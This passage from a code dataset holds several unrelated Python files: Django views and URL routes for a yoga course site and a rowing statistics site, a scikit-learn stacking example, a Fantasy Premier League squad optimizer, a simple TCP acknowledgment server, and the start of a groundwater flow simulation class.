render(request, 'coursemessageUI.html', {'order': courses, 'Authority': Authority})\n\n\ndef viewCourseDetails(request, coursename): # 显示课程的详细信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(coursename=coursename) # 查询这个课程的所有订单(包括付钱和没付钱的)\n Authority = 'Admin'\n\n else: #如果是客户登陆\n username = sessionManager.getUsername() # 获取当前登录的用户名字\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(username=username,coursename=coursename) # 查询这个用户关于这门课的订单状态(付钱和没付钱的)\n Authority = 'Customer'\n return render(request, 'detailmessageUI.html', {'Authority': Authority, 'courses':courses,'order1': detailcourse})\n\n\ndef addCourse(request): # 管理员增加课程信息\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST':\n addcourseForm = AddCourseForm(request.POST)\n if addcourseForm.is_valid():\n coursename = addcourseForm.cleaned_data.get('coursename')\n courseintroduction = addcourseForm.cleaned_data.get('courseintroduction')\n courseprice = addcourseForm.cleaned_data.get('courseprice')\n course = Course()\n course.create(coursename,courseintroduction,courseprice)\n return HttpResponseRedirect(url_course_view_course)\n else:\n addcourseForm = AddCourseForm()\n Authority = 'Admin'\n return render(request, 'addcourseUI.html', locals())\n\n\ndef ModCourse(request, coursename): # 修改课程信息界面\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST': # 如果请求为表单提交\n modcourseForm = ModCourseForm(request.POST) # 获取表单内容\n if modcourseForm.is_valid(): # 解析表单\n courseintroduction = modcourseForm.cleaned_data['courseintroduction']\n courseprice = modcourseForm.cleaned_data['courseprice']\n R = Course.objects.get(coursename=coursename) # 查询当前修改信息的课程对象\n R.setCourseIntroduction(courseintroduction)\n R.setCoursePrice(courseprice)\n return HttpResponseRedirect(url_course_view_course) # 写成功之后,跳转到查看课程\n else:\n r = Course.objects.get(coursename=coursename) # 查询当前课程的信息\n modcourseForm = ModCourseForm(instance=r) # 创建表单\n return render(request, 'modcourseUI.html', locals())\n\n\ndef DelCourse(request, coursename): # 执行下架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(False) # 下架课程\n Authority = 'Admin'\n return render(request, 'successfulUI.html', locals())\n\n\ndef reAddCourse(request, coursename): # 执行重新上架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(True) # 重新上架课程\n return render(request, 'successfulUI.html', locals())\n\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/Course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6428877716","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\n# Classifiers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\n\nnp.random.seed(2017) # seed to shuffle the train set\n\n# read the data in\ndf = pd.read_csv(\"chapter4/Diabetes.csv\")\n\nX = df.ix[:,0:8] # independent variables\ny = df['class'].values # dependent variables\n\n#Normalize\nX = StandardScaler().fit_transform(X)\n\n# evaluate the model by splitting into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=2017)\nkfold = cross_validation.StratifiedKFold(y=y_train, n_folds=5, random_state=2017)\nnum_trees = 10\n\nverbose = True # to print the progress\n\nclfs = [KNeighborsClassifier(),RandomForestClassifier(n_estimators=num_trees, random_state=2017),\n GradientBoostingClassifier(n_estimators=num_trees, random_state=2017)]\n\n#Creating train and test sets for blending\ndataset_blend_train = np.zeros((X_train.shape[0], len(clfs)))\ndataset_blend_test = np.zeros((X_test.shape[0], len(clfs)))\n\nprint('5-fold cross validation:\\n')\n\nfor i, clf in enumerate(clfs):\n scores = cross_validation.cross_val_score(clf, X_train, y_train, cv=kfold,scoring='accuracy')\n print(\"##### Base Model %0.0f #####\" % i)\n print(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\n clf.fit(X_train, y_train)\n print(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_train),y_train)))\n dataset_blend_train[:,i] = clf.predict_proba(X_train)[:, 1]\n dataset_blend_test[:,i] = clf.predict_proba(X_test)[:, 1]\n print(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_test),y_test)))\n\nprint (\"##### Meta Model #####\")\nclf = LogisticRegression()\nscores = cross_validation.cross_val_score(clf, dataset_blend_train, y_train,\ncv=kfold, scoring='accuracy')\nclf.fit(dataset_blend_train, y_train)\n\nprint(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\nprint(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_train), y_train)))\nprint(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_test), y_test)))","repo_name":"raja21068/Machine-Learning-Toturials","sub_path":"78_Stacking.py","file_name":"78_Stacking.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18703713466","text":"import os\nimport pdb\nimport pulp\nimport random\nimport shap\nfrom pathlib import Path\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State\nfrom app import app\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom fastai.tabular import load_learner\n\ntry:\n from layouts.layout_utils import make_table, make_dropdown, make_line_plot\n from scripts.data_loader import DataLoader, check_cache_validity\n from scripts.data_processor import DataProcessor\n from scripts.data_scrape import DataScraper\n from scripts.utils import load_config\n from app import cache\n from scripts.data_preparation import ModelDataMaker\n from scripts.model_data_ingestion import DataIngestor\n from scripts.feature_engineering import make_XY_data\n from scripts.models import load_data, train_lgbm_model, train_fastai_model\nexcept:\n raise ImportError\n\nCONFIG_2020 = {\n \"data_dir\": \"./data/model_data/2020_21/\",\n \"file_fixture\": \"fixtures.csv\",\n \"file_team\": \"teams.csv\",\n \"file_gw\": \"merged_gw.csv\",\n \"file_player\": \"players_raw.csv\",\n \"file_understat_team\": \"understat_team_data.pkl\",\n \"scoring_gw\": \"NA\"\n}\n\nTIMEOUT = 3600\n\n\ndef add_position_dummy(df):\n for p in df.position.unique():\n df['is_' + str(p).lower()] = np.where(df.position == p, int(1), int(0))\n return df\n\n\ndef add_team_dummy(df):\n for t in df.team.unique():\n df['team_' + str(t).lower()] = np.where(df.team == t, int(1), int(0))\n return df\n\n\ndef squad_optimizer(df, formation, budget=100.0, optimise_on='LGBM Point'):\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL', pulp.LpMaximize)\n # create a dictionary of pulp variables with keys from names\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[optimise_on])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n df_squad = pd.DataFrame(optimal_squad)\n df_squad = df_squad.sort_values(by=['position', 'points'], ascending=False)\n return df_squad, solution_info\n\n\ndef transfer_optimizer(df_leads, manager_id, num_transfers, model_name):\n\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n config = load_config()\n data_loader = DataLoader(config)\n df_team = pd.DataFrame(data_loader.get_manager_current_gw_picks(manager_id))\n df_team = df_team.rename(columns={\"element\": \"player_id\"})\n bank = data_loader.get_manager_bank_balance(manager_id)\n\n df_cost = df_leads[[\"player_id\", \"cost\", \"name\", model_name]].copy()\n df_team = pd.merge(df_team, df_cost, how='inner', on='player_id')\n prev_score = df_team[model_name].sum()\n\n budget = df_team[\"cost\"].sum() + bank\n\n # print(df_team.head())\n # print(df_leads.head())\n # print(budget)\n\n # optimization\n\n df = df_leads.copy()\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n current_players = df_team[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL_Transfers', pulp.LpMaximize)\n\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[model_name])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n formation = '2-5-5-3'\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n constraints[\"num_keep\"] = 15 - num_transfers\n\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n fpl_problem += sum([x[i] for i in current_players]) == constraints['num_keep']\n\n # team constraints\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n # pdb.set_trace()\n df_squad = pd.DataFrame(optimal_squad)\n now_score = df_squad[\"points\"].sum()\n new_squad = set(df_squad[\"name\"].unique().tolist())\n current_players = set(current_players)\n transfer_in = list(new_squad.difference(current_players))\n transfer_out = list(current_players.difference(new_squad))\n transfer_in = [in_player.decode('utf-8') for in_player in transfer_in]\n transfer_out = [out_player.decode('utf-8') for out_player in transfer_out]\n df_res = pd.DataFrame()\n gain = [0 for i in range(len(transfer_in))]\n gain[-1] = now_score - prev_score\n df_res[\"Transfer In\"] = transfer_in\n df_res[\"Transfer Out\"] = transfer_out\n df_res[\"gain\"] = gain\n df_res[\"gain\"] = df_res[\"gain\"].round(2)\n df_res[\"gain\"] = df_res[\"gain\"].astype(str)\n df_res[\"gain\"] = df_res[\"gain\"].apply(lambda y: \"\" if int(float(y)) == 0 else y)\n df_res = df_res.rename(columns={\"gain\": \"Gain\"})\n return df_res\n\n\n@cache.memoize(timeout=TIMEOUT)\ndef load_leads(gw_id):\n data_maker = ModelDataMaker(CONFIG_2020)\n output_dir = \"./data/model_outputs/\"\n lgbm_point_path = os.path.join(output_dir, \"lgbm_point_predictions_gw_{}.csv\".format(gw_id))\n lgbm_potential_path = os.path.join(output_dir, \"lgbm_potential_predictions_gw_{}.csv\".format(gw_id))\n lgbm_return_path = os.path.join(output_dir, \"lgbm_return_predictions_gw_{}.csv\".format(gw_id))\n\n fastai_point_path = os.path.join(output_dir, \"fastai_point_predictions_gw_{}.csv\".format(gw_id))\n fastai_potential_path = os.path.join(output_dir, \"fastai_potential_predictions_gw_{}.csv\".format(gw_id))\n fastai_return_path = os.path.join(output_dir, \"fastai_return_predictions_gw_{}.csv\".format(gw_id))\n all_paths = [lgbm_point_path, lgbm_potential_path, lgbm_return_path,\n fastai_point_path, fastai_potential_path, fastai_return_path]\n dfs = []\n for file_path in all_paths:\n if not check_cache_validity(file_path, valid_days=2.0):\n return html.P(\"refresh model scores\")\n df = pd.read_csv(file_path)\n dfs.append(df)\n XY_train, XY_test, XY_scoring, features_dict = load_data(gw_id)\n player_id_team_id_map = data_maker.get_player_id_team_id_map()\n player_id_player_name_map = data_maker.get_player_id_player_name_map()\n player_id_player_position_map = data_maker.get_player_id_player_position_map()\n team_id_team_name_map = data_maker.get_team_id_team_name_map()\n player_id_cost_map = data_maker.get_player_id_cost_map()\n player_id_play_chance_map = data_maker.get_player_id_play_chance_map()\n player_id_selection_map = data_maker.get_player_id_selection_map()\n player_id_ave_points_map = data_maker.get_player_id_ave_points_map()\n\n df_leads = pd.DataFrame()\n df_leads[\"player_id\"] = XY_scoring[\"player_id\"].values\n df_leads[\"name\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_name_map.get(x, x))\n df_leads[\"team\"] = df_leads[\"player_id\"].apply(lambda x: team_id_team_name_map[player_id_team_id_map.get(x, x)])\n df_leads[\"next_opponent\"] = XY_scoring[\"opp_team_id\"].apply(lambda x: team_id_team_name_map.get(x, x))\n df_leads[\"position\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_position_map.get(x, x))\n df_leads[\"chance_of_play\"] = df_leads[\"player_id\"].apply(lambda x: player_id_play_chance_map.get(x, x))\n df_leads[\"cost\"] = df_leads[\"player_id\"].apply(lambda x: player_id_cost_map.get(x, x))\n df_leads[\"selection_pct\"] = df_leads[\"player_id\"].apply(lambda x: player_id_selection_map.get(x, x))\n df_leads[\"ave_pts\"] = df_leads[\"player_id\"].apply(lambda x: player_id_ave_points_map.get(x, x))\n df_leads[\"gw\"] = gw_id\n df_leads = df_leads.drop_duplicates(subset=[\"player_id\"])\n\n # merge predictions\n for df in dfs:\n df = df.drop_duplicates()\n df_leads = pd.merge(df_leads, df, how='left', on=['player_id', 'gw'])\n df_leads[\"cost\"] = df_leads[\"cost\"] / 10\n\n model_name_col_map = {\n \"LGBM Point\": \"lgbm_point_pred\",\n \"LGBM Potential\": \"lgbm_potential_pred\",\n \"LGBM Return\": \"lgbm_return_pred\",\n \"Fast Point\": \"fastai_point_pred\",\n \"Fast Potential\": \"fastai_potential_pred\",\n \"Fast Return\": \"fastai_return_pred\"\n }\n col_model_name_map = dict()\n for k, v in model_name_col_map.items():\n col_model_name_map[v] = k\n\n df_leads = df_leads.rename(columns=col_model_name_map)\n df_leads[\"Net\"] = (2 * df_leads[\"LGBM Point\"] + df_leads[\"LGBM Potential\"] +\n 2 * df_leads[\"Fast Point\"] + df_leads[\"Fast Potential\"]) * df_leads[\"Fast Return\"] * df_leads[\n \"LGBM Return\"]\n max_net = df_leads[\"Net\"].max()\n df_leads[\"Net\"] = df_leads[\"Net\"] / max_net\n return df_leads\n\n\n@app.callback(Output('player-compare-output', 'children'),\n [Input('player-selection-dropdown-a', 'value'),\n Input('player-selection-dropdown-b', 'value'),\n Input('gw-selection-dropdown-squad', 'value')],\n prevent_initial_call=True)\ndef execute_player_comparison(player_a, player_b, gw_id):\n if not player_a:\n msg = html.P(\"Please select first player\")\n return msg\n if not player_b:\n msg = html.P(\"Please select second player\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select gameweek in left layout\")\n return msg\n #\n df_leads = load_leads(gw_id)\n\n # normalization\n pot_div = 12\n point_div = 6\n retrun_div = 0.8\n\n df_leads[\"LGBM Potential\"] = df_leads[\"LGBM Potential\"] / pot_div\n df_leads[\"Fast Potential\"] = df_leads[\"Fast Potential\"] / pot_div\n df_leads[\"LGBM Point\"] = df_leads[\"LGBM Point\"] / point_div\n df_leads[\"Fast Point\"] = df_leads[\"Fast Point\"] / point_div\n df_leads[\"LGBM Return\"] = df_leads[\"LGBM Return\"] / 0.8\n df_leads[\"Fast Return\"] = df_leads[\"Fast Return\"] / 0.4\n df_leads[\"Net\"] = df_leads[\"Net\"] / 0.4\n df_leads[\"Cost\"] = df_leads[\"cost\"] / 10.0\n\n df_a = df_leads[df_leads[\"name\"] == player_a].copy()\n df_b = df_leads[df_leads[\"name\"] == player_b].copy()\n keep_cols = [\"LGBM Point\", \"LGBM Potential\", \"LGBM Return\",\n \"Fast Point\", \"Fast Potential\", \"Fast Return\", \"Cost\"]\n df_a = df_a[keep_cols].copy().T.reset_index()\n df_a.columns = [\"theta\", \"r\"]\n\n df_b = df_b[keep_cols].copy().T.reset_index()\n df_b.columns = [\"theta\", \"r\"]\n\n # pdb.set_trace()\n fig = go.Figure()\n fig.add_trace(go.Scatterpolar(r=df_a['r'].values, theta=df_a[\"theta\"].values,\n fill='toself', name=player_a))\n fig.add_trace(go.Scatterpolar(r=df_b['r'].values, theta=df_b[\"theta\"].values,\n fill='toself', name=player_b))\n fig.update_layout(polar=dict(radialaxis=dict(visible=False)), showlegend=True)\n # fig = px.line_polar(df_a, r='r', theta='theta', line_close=True)\n graph = dcc.Graph(figure=fig)\n return graph\n\n\n@app.callback([Output('squad-optim-output-play-xi', 'children'),\n Output('squad-optim-output-bench', 'children')],\n [Input('squad-optimization-btn', 'n_clicks')],\n [State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value'),\n State('formation-selection-dropdown-squad', 'value'),\n State('squad-value-input', 'value'),\n State('bench-value-input', 'value'),\n State('uncertain-flag', 'value')],\n prevent_initial_call=True)\ndef execute_squad_optimization(n_clicks, gw_id, model_name, formation, squad_val, bench_val, uncertain_flag):\n if not gw_id:\n msg = html.P(\"Please select GW for scoring\")\n return msg, msg\n\n if not model_name:\n msg = html.P(\"Please select Model\")\n return msg, msg\n\n if not formation:\n msg = html.P(\"Please select Formation\")\n return msg, msg\n\n if not squad_val:\n msg = html.P(\"Please select Squad Value\")\n return msg, msg\n\n if not bench_val:\n msg = html.P(\"Please select Bench Value\")\n return msg, msg\n\n if not uncertain_flag:\n msg = html.P(\"Please select Uncertain Flag\")\n return msg, msg\n df_leads = load_leads(gw_id)\n # pdb.set_trace()\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n print(df_leads.head())\n if n_clicks:\n df_squad_xi, sol_info_xi = squad_optimizer(df_leads, formation=formation,\n budget=squad_val - bench_val, optimise_on=model_name)\n xi_players = [int(i) for i in formation.split('-')]\n bench_players = [str(2 - xi_players[0]), str(5 - xi_players[1]), str(5 - xi_players[2]), str(3 - xi_players[3])]\n bench_formation = \"-\".join(bench_players)\n xi_names = df_squad_xi[\"name\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(xi_names)].copy()\n df_squad_bench, sol_info_bench = squad_optimizer(df_leads, formation=bench_formation,\n budget=bench_val, optimise_on=model_name)\n\n df_squad_xi[\"name\"] = df_squad_xi[\"name\"].apply(lambda x: x.decode('utf-8'))\n df_squad_bench[\"name\"] = df_squad_bench[\"name\"].apply(lambda x: x.decode('utf-8'))\n # df_squad = df_squad[[\"position\", \"cost\", \"points\"]].copy()\n df_squad_xi[\"points\"] = df_squad_xi[\"points\"].round(2)\n df_squad_bench[\"points\"] = df_squad_bench[\"points\"].round(2)\n col_map = {\"name\": \"Player\", \"team\": \"Team\", \"cost\": \"Cost\", \"position\": \"Position\", \"points\": model_name}\n df_squad_xi = df_squad_xi.rename(columns=col_map)\n df_squad_bench = df_squad_bench.rename(columns=col_map)\n position_map = {'GK': 1, 'DEF': 2, 'MID': 3, 'FWD': 4}\n\n df_squad_xi[\"pos_map\"] = df_squad_xi[\"Position\"].apply(lambda x: position_map[x])\n df_squad_bench[\"pos_map\"] = df_squad_bench[\"Position\"].apply(lambda x: position_map[x])\n df_squad_xi = df_squad_xi.sort_values(by=[\"pos_map\"])\n df_squad_bench = df_squad_bench.sort_values(by=[\"pos_map\"])\n df_squad_xi = df_squad_xi.drop(columns=[\"pos_map\"])\n df_squad_bench = df_squad_bench.drop(columns=[\"pos_map\"])\n table_xi, table_bench = make_table(df_squad_xi, page_size=11), make_table(df_squad_bench)\n\n return table_xi, table_bench\n else:\n return html.P(\"Button Not Clicked!\")\n\n\n@app.callback(Output('transfer-suggestion-output', 'children'),\n [Input('transfer-optimization-btn', 'n_clicks')],\n [State('manager-selection-transfers', 'value'),\n State('transfer-selection-numbers', 'value'),\n State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value')],\n prevent_initial_call=True)\ndef execute_transfer_suggestions(n_clicks, manager_id, num_transfers, gw_id, model_name):\n if not manager_id:\n msg = html.P(\"Please select manager...\")\n return msg\n if not num_transfers:\n msg = html.P(\"Please select number of transfer to be made...\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select GW for scoring...\")\n return msg\n if not model_name:\n msg = html.P(\"Please select ML Model...\")\n return msg\n\n if n_clicks:\n tables = []\n n_suggestions = 5\n df_leads = load_leads(gw_id)\n\n for i in range(n_suggestions):\n try:\n df_transfer = transfer_optimizer(df_leads, manager_id, num_transfers, model_name)\n tables.append(make_table(df_transfer))\n exclude_names = df_transfer[\"Transfer In\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(exclude_names)].copy()\n except:\n pass\n\n output = html.Div(\n children= tables\n )\n\n return output\n\n return html.P(\"Button Not Clicked!\")\n","repo_name":"rbiswasfc/fpl-portal","sub_path":"callbacks/callback_squad.py","file_name":"callback_squad.py","file_ext":"py","file_size_in_byte":19779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15403946953","text":"from django.conf.urls import url, include, re_path\nfrom ajax_select import urls as ajax_select_urls\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import RedirectView\n\nfrom . import views\nfrom .views import IndexView, RowerList, RowerDetail, RaceList, RaceDetail, RankingView, AboutView, ClubList, ClubDetail, RowerSearch, CompetitionView, CompetitionResults, RowerCompare, Compare, IndexView2, KnockoutView, WeatherCalc\nurlpatterns = [\n\t#re_path(r'^$', views.current_datetime, name='index'),\n\t#re_path(r'^recalculate/$', views.CalculateView),\n\t#re_path(r'^$', views.IndexView.as_view(), name='index'),\n\tre_path(r'^$', views.IndexView2, name='index'),\n\tre_path(r'^about/$', views.AboutView.as_view(), name='about'),\n\tre_path(r'^rowers/$', RowerList.as_view(), name=\"rower-list\"),\n\tre_path(r'^rowers/(?P[0-9]+)/$', views.RowerDetail, name=\"rower-detail\"),\n\tre_path(r'^races/$', RaceList.as_view(), name=\"race-list\"),\n\tre_path(r'^races/(?P[0-9]+)/$', views.RaceDetail, name=\"race-detail\"),\n\tre_path(r'^rankings/$', views.RankingView, name=\"ranking\"),\n\tre_path(r'^competition/$', views.CompetitionView, name=\"comp-list\"),\n\tre_path(r'^competition/(?P[0-9]+)/$', views.CompetitionResults, name=\"comp-detail\"),\n\tre_path(r'^clubs/$', ClubList.as_view(), name=\"club-list\"),\n\tre_path(r'^clubs/(?P[0-9]+)/$', views.ClubDetail, name=\"club-detail\"),\n\t#re_path(r'^compare/$', csrf_exempt(views.Compare), name=\"compare-index\"),\n\tre_path(r'^compare/$', views.RowerCompare2, name=\"compare2\"),\n\tre_path(r'^crewcompare/$', views.CrewCompare, name=\"crewcompare\"),\n\tre_path(r'^rowing/hrr/(?P[0-9]+)/$', views.KnockoutView, name=\"knockouts\"),\n\tre_path(r'^favicon\\.ico$',RedirectView.as_view(url='/static/favicon.ico')),\n re_path(r'^weather/$', views.WeatherCalc, name=\"weather\"),\n\t#re_path(r'^compare/(?P[0-9]+)/(?P[0-9]+)/$', views.RowerCompare, name=\"compare\"),\n\t#re_path(r'^rower-autocomplete/$', RowerAutocomplete.as_view(), name=\"rower-autocomplete\"),\n\t#re_path(r'rowerm2m/$', CrewUpdate.as_view(), name=\"crew-update\"),\n\n\t# used in the search function on the rowers view\n\tre_path(r'^rowersearch/$', views.RowerSearch, name=\"rower-search\"),\n\t\n\t# used in autoselect in admin\n\tre_path(r'^ajax_select/', include(ajax_select_urls)),\n]","repo_name":"charlesbarry/rowingstats","sub_path":"rowing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29356506297","text":"import socket\nimport threading\nimport signal\nimport sys\n\n# Define the IP address and port to listen on\nIP = '0.0.0.0' # Listen on all available network interfaces\nPORT = 1234 # Port number to listen on\n\n# Global variable to track whether the server should continue running\nserver_running = True\n\n# Function to handle incoming client connections\ndef handle_client(client_socket):\n with client_socket as sock:\n # Receive data from the client (up to 1024 bytes)\n request = sock.recv(1024)\n print(f'[*] Received: {request.decode(\"utf-8\")}')\n \n # Send a simple acknowledgment back to the client\n sock.send(b'ACK')\n\n# Signal handler for ctrl+c\ndef signal_handler(sig, frame):\n global server_running\n print(\"[*] Exiting server...\")\n server_running = False\n sys.exit(0)\n\n# Main function to set up the server\ndef main():\n # Register the signal handler for ctrl+c\n signal.signal(signal.SIGINT, signal_handler)\n \n # Create a socket object using IPv4 and TCP\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the IP and port\n server.bind((IP, PORT))\n\n # Listen for incoming connections, allowing up to 5 queued connections\n server.listen(5)\n print(f'[*] Listening on {IP}:{PORT}')\n\n while server_running:\n try:\n # Accept an incoming connection, client is a new socket object\n # and address is the client's address (IP and port)\n client, address = server.accept()\n print(f'[*] Accepted connection from {address[0]}:{address[1]}')\n\n # Create a new thread to handle the client's communication\n client_handler = threading.Thread(target=handle_client, args=(client,))\n client_handler.start()\n except KeyboardInterrupt:\n # If ctrl+c is pressed during server operation, terminate gracefully\n print(\"[*] Server interrupted by user.\")\n server.close()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"CaptLevi0408/Black-Hat-Python","sub_path":"Basic Networking Tools/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"931098669","text":"# 地下水流随机方程的数值模拟求解尝试\nimport random\nfrom scipy.fftpack import fft, ifft\n\nimport numpy as np\nfrom numpy import sin, cos, tan\nimport numpy.linalg as nla\nfrom sympy import symbols\nimport sympy as sy\nimport matplotlib\n\nmatplotlib.use('QtAgg')\nimport matplotlib.pyplot as plt\n\n\nclass Random_flow:\n def __init__(self):\n self.ic = None\n self.tl = None\n self.st = None\n self.name_chinese = \"非稳定随机一维流\"\n self.xl = None\n self.sl = None\n self.h_r = []\n self.h_l = []\n self.B = 1 # 默认一维流的宽度为1个单位\n\n def l_boundary(self, h_l, Dirichlet=False, Neumann=False, Robin=False): # 左边界\n if Dirichlet:\n self.h_l = [1, float(h_l)]\n elif Neumann:\n self.h_l = [2, float(h_l)]\n\n def r_boundary(self, h_r, Dirichlet=False, Neumann=False, Robin=False): # 右边界\n if Dirichlet:\n self.h_r = [1, float(h_r)]\n elif Neumann:\n self.h_r = [2, float(h_r)]\n\n def step_length(self, sl): # X轴差分步长\n self.sl = float(sl)\n\n def step_time(self, st): # 时间轴差分步长\n self.st = float(st)\n\n def x_length(self, xl): # X轴轴长\n self.xl = float(xl)\n\n def t_length(self, tl): # 